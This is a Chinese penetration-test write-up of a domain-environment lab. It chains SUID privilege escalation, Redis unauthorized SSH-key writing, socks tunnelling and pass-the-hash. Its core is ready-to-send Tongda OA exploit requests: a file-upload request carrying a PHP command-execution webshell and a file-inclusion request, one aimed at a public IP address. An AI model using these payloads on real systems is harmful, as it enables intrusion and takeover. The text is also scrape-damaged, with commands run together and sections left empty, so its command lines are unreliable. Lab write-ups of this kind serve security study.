Ubuntu (Web 1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在VMnet8上连通第二层网络。
Ubuntu (Web 2)和Windows 7 (PC 1)都配置了两个网卡,一个连接在VMnet8上连通第二层网络,一个连接在VMnet14上连通第三层网络。
Windows Server 2012和Windows 7 (PC 2)都只配置了一个网卡,一个连接在VMnet14上连通第三层网络。
2.1信息收集
首先获得目标ip为192.168.1.104,对目标进行端口服务扫描
2.2CVE-2021-3129
![记一次曲折的域环境渗透测试四 记一次曲折的域环境渗透测试四]()
2.3提权
目前我们在www-data用户下,权限较低,需要先提权
find / -perm -u=s -type f 2>/dev/null
此处我们发现home目录下存在shell文件,运行发现是ps命令
因为蚁剑是伪终端,所以需要先反弹shell到kali上
cd /tmpecho "/bin/bash" > pschmod 777 psexport PATH=/tmp:$PATHcd /home/jobs./shell
后面本来想做docker逃逸的,但是逃逸一直不成功,所以先换个思路
2.4 redis未授权
我们发现目标机192.168.1.104还开启了6379端口
ssh-keygen -t rsa(echo -e "nn"; cat /root/.ssh/id_rsa.pub; echo -e "nn") > 1.txt #将公钥信息写入1.txtcat 1.txt | redis-cli -h 192.168.0.103 -x set xxx
config set dir /root/.ssh # 设置redis的备份路径为/root/.ssh/config set dbfilename authorized_keys # 设置保存文件名为authorized_keyssave # 将数据保存在目标服务器硬盘上
2.5 docker逃逸
在docker容器里挂载一个宿主的本地目录,这样某些容器里输出的文件,就可以在本地目录中打开访问了
此时我们得到两台主机权限,分别是192.168.1.104和192.168.52.20
./ew_for_linux64 -s rcsocks -l 7777 -e 1234
./ew_for_linux64 -s rssocks -d 192.168.1.128 -e 1234
这里看到8080跑了nginx,直接网页代理上去看看
3.1 通达OA
3.1.1 任意用户登陆
指向/logincheck_code.php、删除cookie并在post中添加UID=1
3.1.2 任意文件上传
任意文件上传漏洞/ispirit/im/upload.php
POST /ispirit/im/upload.php HTTP/1.1Host: 49.233.3.2:8888Content-Length: 658Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: close------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php$command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh1YB4pV8McGB--
上传成功,文件名为2102/130054384.jpg
3.1.3 文件包含
POST /ispirit/interface/gateway.php HTTP/1.1Host: 49.233.3.2:8888Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 69Content-Type: application/x-www-form-urlencodedjson={"url":"/general/../../attach/im/2007/422124454.jpg"}&cmd=whoami
3.2 getshell
3.3 信息收集
4.1 CS
这里直接拿到administrator密码就没什么好说的了,直接hash传递拿域控,然后加个新的监听再用拿下域内主机
4.2 MSF
PS:这可能是这个系列最后一篇内容了,顺应公司规划,后续工作重心调整到其他方面,不会再产出域渗透相关内容了...
原文始发于微信公众号(SAINTSEC):记一次曲折的域环境渗透测试四
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/3845277.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论